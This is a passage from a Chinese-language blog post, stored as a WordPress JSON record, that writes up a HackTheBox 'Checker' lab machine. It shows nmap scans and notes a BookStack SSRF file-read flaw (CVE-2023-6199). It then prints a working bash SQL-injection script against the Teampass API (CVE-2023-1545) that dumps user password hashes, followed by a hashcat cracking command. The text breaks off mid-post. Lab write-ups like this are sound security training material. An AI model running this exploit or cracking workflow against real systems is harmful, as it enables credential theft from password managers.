{"id":225,"date":"2025-02-26T16:53:43","date_gmt":"2025-02-26T08:53:43","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=225"},"modified":"2026-01-29T16:16:16","modified_gmt":"2026-01-29T08:16:16","slug":"225","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/02\/26\/225\/","title":{"rendered":"HTB\u9776\u673a Checker \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"
\n

\u76ee\u6807\u4fe1\u606f<\/h1>\n

IP\u5730\u5740\uff1a<\/strong>10.10.11.56<\/strong><\/code><\/p><\/blockquote>\n

\n

\u4fe1\u606f\u6536\u96c6<\/h1>\n

ICMP\u68c0\u6d4b<\/h2>\n
PING 10.10.11.56 (10.10.11.56) 56(84) bytes of data.\n64 bytes from 10.10.11.56: icmp_seq=1 ttl=63 time=352 ms\n64 bytes from 10.10.11.56: icmp_seq=2 ttl=63 time=236 ms\n64 bytes from 10.10.11.56: icmp_seq=3 ttl=63 time=219 ms\n64 bytes from 10.10.11.56: icmp_seq=4 ttl=63 time=211 ms\n\n--- 10.10.11.56 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3002ms\nrtt min\/avg\/max\/mdev = 211.148\/254.477\/352.028\/57.008 ms<\/code><\/pre>\n
\u653b\u51fb\u673a\u7f51\u7edc\u8fde\u63a5\u6b63\u5e38\u3002<\/p>\n
\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n
# Nmap 7.95 scan initiated Mon Feb 24 15:12:55 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN .\/fin_result.txt 10.10.11.56\nWarning: 10.10.11.56 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.11.56\nHost is up (0.21s latency).\nNot shown: 65532 closed tcp ports (reset)\nPORT     STATE         SERVICE\n22\/tcp   open|filtered ssh\n80\/tcp   open|filtered http\n8080\/tcp open|filtered http-proxy\n\n# Nmap done at Mon Feb 24 15:13:25 2025 -- 1 IP address (1 host up) scanned in 29.99 seconds<\/code><\/pre>\n
\u9776\u673a\u7591\u4f3c\u5f00\u653e\u4e86\u4ee5\u4e0b\u670d\u52a1\uff1assh\/22<\/code>\u300180,8080\/http<\/code>\u3002<\/p>\n
\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n
TCP<\/code>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.95 scan initiated Mon Feb 24 15:15:31 2025 as: \/usr\/lib\/nmap\/nmap -sS -sV -A -p- --min-rate 3000 -oN .\/tcp_report.txt 10.10.11.56\nWarning: 10.10.11.56 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.11.56\nHost is up (0.20s latency).\nNot shown: 65532 closed tcp ports (reset)\nPORT     STATE SERVICE VERSION\n22\/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 aa:54:07:41:98:b8:11:b0:78:45:f1:ca:8c:5a:94:2e (ECDSA)\n|_  256 8f:2b:f3:22:1e:74:3b:ee:8b:40:17:6c:6c:b1:93:9c (ED25519)\n80\/tcp   open  http    Apache httpd\n|_http-server-header: Apache\n|_http-title: 403 Forbidden\n8080\/tcp open  http    Apache httpd\n|_http-server-header: Apache\n|_http-title: 403 Forbidden\nDevice type: general purpose\nRunning: Linux 4.X|5.X\nOS CPE: cpe:\/o:linux:linux_kernel:4 cpe:\/o:linux:linux_kernel:5\nOS details: Linux 4.15 - 5.19\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using port 554\/tcp)\nHOP RTT       ADDRESS\n1   215.44 ms 10.10.14.1\n2   215.71 ms 10.10.11.56\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Mon Feb 24 15:16:37 2025 -- 1 IP address (1 host up) scanned in 65.88 seconds<\/code><\/pre>\n
UDP<\/strong><\/code>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.95 scan initiated Mon Feb 24 15:17:30 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN .\/udp_report.txt 10.10.11.56\nWarning: 10.10.11.56 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.11.56\nHost is up (0.24s latency).\nAll 65535 scanned ports on 10.10.11.56 are in ignored states.\nNot shown: 65315 open|filtered udp ports (no-response), 220 closed udp ports (port-unreach)\n\n# Nmap done at Mon Feb 24 15:21:35 2025 -- 1 IP address (1 host up) scanned in 244.35 seconds<\/code><\/pre>\n
UDP<\/strong><\/code>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
\uff08\u65e0\uff09<\/code><\/pre>\n
\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3aUbuntu Linux<\/code>\uff0c\u6839\u636eHackTheBox<\/code>\u9776\u673a\u63d0\u4ea4\u89c4\u5219\uff0c\u5f53\u524d\u9776\u673a\u4e3b\u57df\u540d\u5c06\u88ab\u8bbe\u7f6e\u4e3achecker.htb<\/code>\u3002<\/p>\n
\n
\u670d\u52a1\u63a2\u6d4b<\/h1>\n
SSH\u670d\u52a1\uff0822\u7aef\u53e3\uff09<\/h2>\n
\u7aef\u53e3Banner<\/code>\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/megumin\/Documents\/pentest_notes\/checker]\n\u2514\u2500# nc -nv 10.10.11.56 22                                        \n(UNKNOWN) [10.10.11.56] 22 (ssh) open\nSSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.10<\/code><\/pre>\n
Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n
\u6253\u5f00\u4e3b\u9875\uff1ahttp:\/\/checker.htb\/<\/code><\/p>\n
\"\"<\/p>\n
\u53d1\u73b0\u9776\u673a80<\/code>\u7aef\u53e3\u90e8\u7f72\u4e86BookStack<\/code>\u4e2a\u4eba\u7b14\u8bb0\u7ba1\u7406\u7cfb\u7edf\u3002\u5c1d\u8bd5\u67e5\u770b\u6e90\u4ee3\u7801\uff0c\u53d1\u73b0\u9875\u9762\u5f15\u7528\u4e86\u7cfb\u7edf\u81ea\u8eab\u7684CSS<\/code>\u6837\u5f0f\/dist\/styles.css<\/code>\uff0c\u8fd8\u9644\u5e26\u4e86version<\/code>\u53c2\u6570\uff0c\u5185\u5bb9\u4e3av23.10.2<\/code>\uff1a<\/p>\n
<!-- Styles -->\n<link rel=\"stylesheet\" href=\"http:\/\/checker.htb\/dist\/styles.css?version=v23.10.2\"><\/code><\/pre>\n
\u63a8\u6d4bBookStack<\/code>\u7cfb\u7edf\u7248\u672c\u4e3av23.10.2<\/code>\u3002\u5c1d\u8bd5\u8054\u7f51\u641c\u7d22\u6f0f\u6d1e\uff1a<\/p>\n
\"\"<\/p>\n
\u6210\u529f\u53d1\u73b0BookStack v23.10.2<\/code>\u7cfb\u7edf\u5b58\u5728\u6388\u6743SSRF<\/code>\u6f0f\u6d1e\uff08CVE-2023-6199<\/code>\uff09\uff01\u8be5\u7cfb\u7edf\u540e\u53f0\u5728\u5904\u7406\u7b14\u8bb0\u63d0\u4ea4\u65f6\uff0c\u4f1a\u63d0\u53d6HTTP POST<\/code>\u8bf7\u6c42\u53c2\u6570HTML<\/code>\u4e2d\u7684img<\/code>\u6807\u7b7e\uff0c\u5982\u679cHTML<\/code>\u56fe\u7247\u6807\u7b7e\u4f7f\u7528Base64<\/code>\u7f16\u7801\u56fe\u7247\u5185\u5bb9\u5e76\u5c06\u5176\u786c\u7f16\u7801\u5728\u6807\u7b7e\u5185\u90e8\uff0c\u5219\u540e\u53f0\u4f1a\u81ea\u52a8\u89e3\u7801\u5904\u7406Base64<\/code>\u5b57\u7b26\u4e32\u3002\u4f46\u5982\u679c\u5f53img<\/code>\u6807\u7b7e\u5185\u7684Base64<\/code>\u503c\u4e3aURL<\/code>\u65f6\uff0c\u540e\u53f0\u4f1a\u81ea\u884c\u8bbf\u95ee\u8be5URL<\/code>\uff0c\u8fd9\u91cc\u4fbf\u9020\u6210\u4e86SSRF<\/code>\u6f0f\u6d1e\u3002\u9664\u4e86\u4f7f\u7528http<\/code>\u534f\u8bae\u8bbf\u95ee\u6307\u5b9a\u7f51\u9875\uff0c\u8fd8\u53ef\u4ee5\u4f7f\u7528file:\/\/<\/code>\u534f\u8bae\u6765\u8bbf\u95ee\u670d\u52a1\u5668\u6587\u4ef6\u7cfb\u7edf\u3002<\/p>\n
\u94fe\u63a5\u5730\u5740\uff1aLFR via SSRF in BookStack | Blog | Fluid Attacks<\/a><\/p>\n
Web\u5e94\u7528\u7a0b\u5e8f\uff088080\u7aef\u53e3\uff09<\/h2>\n
\u5c1d\u8bd5\u6253\u5f00\u7f51\u5740http:\/\/checker.htb:8080<\/code>\uff0c\u67e5\u770b\u7f51\u7edc\u8bf7\u6c42\uff0c\u53d1\u73b0\u7f51\u9875\u5c1d\u8bd5\u52a0\u8f7d\u57df\u540dvault.checker.htb<\/code>\u7684\u5185\u5bb9\uff1a<\/p>\n
\"\"<\/p>\n
\u76f4\u63a5\u5728hosts<\/code>\u6587\u4ef6\u5185\u6dfb\u52a0\u89e3\u6790\u8bb0\u5f55\uff0c\u968f\u540e\u8bbf\u95ee\u4e3b\u9875\uff1ahttp:\/\/vault.checker.htb:8080<\/code><\/p>\n
\"\"<\/p>\n
\u53d1\u73b08080<\/code>\u7aef\u53e3\u90e8\u7f72\u4e86Teampass<\/code>\u5bc6\u7801\u7ba1\u7406\u7cfb\u7edf\u3002\u5c1d\u8bd5\u8054\u7f51\u641c\u7d22\u6f0f\u6d1e\uff0c\u53d1\u73b0\u8be5\u7cfb\u7edfv3.0.10<\/code>\u4e4b\u524d\u7248\u672c\u5b58\u5728SQL<\/code>\u6ce8\u5165\u6f0f\u6d1e\uff0cCVE ID<\/code>\u4e3aCVE-2023-1545<\/code>\uff1aSQL Injection in nilsteampassnet\/teampass | CVE-2023-1545 | Snyk<\/a><\/p>\n
\"\"<\/p>\n
\n
\u6e17\u900f\u6d4b\u8bd5<\/h1>\n
Teampass SQL\u6ce8\u5165\u6f0f\u6d1e\u5229\u7528<\/h2>\n
\u57288080<\/code>\u7aef\u53e3\u7684\u670d\u52a1\u63a2\u6d4b\u9636\u6bb5\uff0c\u53d1\u73b0Teampass<\/code>\u5bc6\u7801\u7ba1\u7406\u7cfb\u7edf\u7591\u4f3c\u5b58\u5728SQL<\/code>\u6ce8\u5165\u6f0f\u6d1e\u3002\u5c1d\u8bd5\u4f7f\u7528\u5982\u4e0bEXP<\/code>\u8bfb\u53d6Teampass<\/code>\u7cfb\u7edf\u7684\u7528\u6237\u51ed\u636e\uff1a<\/p>\n
if [ \"$#\" -lt 1 ]; then\n  echo \"Usage: $0 <base-url>\"\n  exit 1\nfi\n\nvulnerable_url=\"$1\/api\/index.php\/authorize\"\n\ncheck=$(curl --silent \"$vulnerable_url\")\nif echo \"$check\" | grep -q \"API usage is not allowed\"; then\n  echo \"API feature is not enabled :-(\"\n  exit 1\nfi\n\n# htpasswd -bnBC 10 \"\" h4ck3d | tr -d ':n'\narbitrary_hash='$2y$10$u5S27wYJCVbaPTRiHRsx7.iImx\/WxRA8\/tKvWdaWQ\/iDuKlIkMbhq'\n\nexec_sql() {\n  inject=\"none' UNION SELECT id, '$arbitrary_hash', ($1), private_key, personal_folder, fonction_id, groupes_visibles, groupes_interdits, 'foo' FROM teampass_users WHERE login='admin\"\n  data=\"{\"login\":\"\"$inject\"\",\"password\":\"h4ck3d\", \"apikey\": \"foo\"}\"\n  token=$(curl --silent --header \"Content-Type: application\/json\" -X POST --data \"$data\" \"$vulnerable_url\" | jq -r '.token')\n  echo $(echo $token| cut -d\".\" -f2 | base64 -d 2>\/dev\/null | jq -r '.public_key')\n}\n\nusers=$(exec_sql \"SELECT COUNT(*) FROM teampass_users WHERE pw != ''\")\n\necho \"There are $users users in the system:\"\n\nfor i in `seq 0 $(($users-1))`; do\n  username=$(exec_sql \"SELECT login FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT $i,1\")\n  password=$(exec_sql \"SELECT pw FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT $i,1\")\n  echo \"$username: $password\"\ndone<\/code><\/pre>\n
\u76f4\u63a5\u6267\u884c\uff1a<\/p>\n
.\/teampass_sqlexp.sh http:\/\/vault.checker.htb:8080<\/code><\/pre>\n
\"\"<\/p>\n
\u6210\u529f\u53d1\u73b0\u7528\u6237\u54c8\u5e0c\u503c\uff01\u4e14\u54c8\u5e0c\u7c7b\u578b\u4e3aBCrypt<\/code>\uff0c\u8fed\u4ee3\u6b21\u6570\u4e3a10<\/code>\u6b21\u3002<\/p>\n
\u7206\u7834Teampass\u7528\u6237\u54c8\u5e0c\u767b\u5f55<\/h2>\n
\u53d1\u73b0\u7528\u6237\u54c8\u5e0c\u4e4b\u540e\uff0c\u5c1d\u8bd5\u4f7f\u7528hashcat<\/code>\u8fdb\u884c\u7206\u7834\u3002\u9996\u5148\u7206\u7834bob<\/code>\u7528\u6237\u7684\u54c8\u5e0c\uff1a$2y$10$yMypIj1keU.VAqBI692f..XXn0vfyBL7C1EhOs35G59NxmtpJ\/tiy<\/code>\uff0c\u5b57\u5178\u4f7f\u7528rockyou.txt<\/code>\uff1a<\/p>\n
.\\hashcat.exe -m 3200 -a 0 \"`$2y`$10`$yMypIj1keU.VAqBI692f..XXn0vfyBL7C1EhOs35G59NxmtpJ\/tiy\" .rockyou.txt --force<\/code><\/pre>\n
\"\"<\/p>\n
\u6210\u529f\u53d1\u73b0\u7528\u6237\u51ed\u636e\uff1a<\/p>\n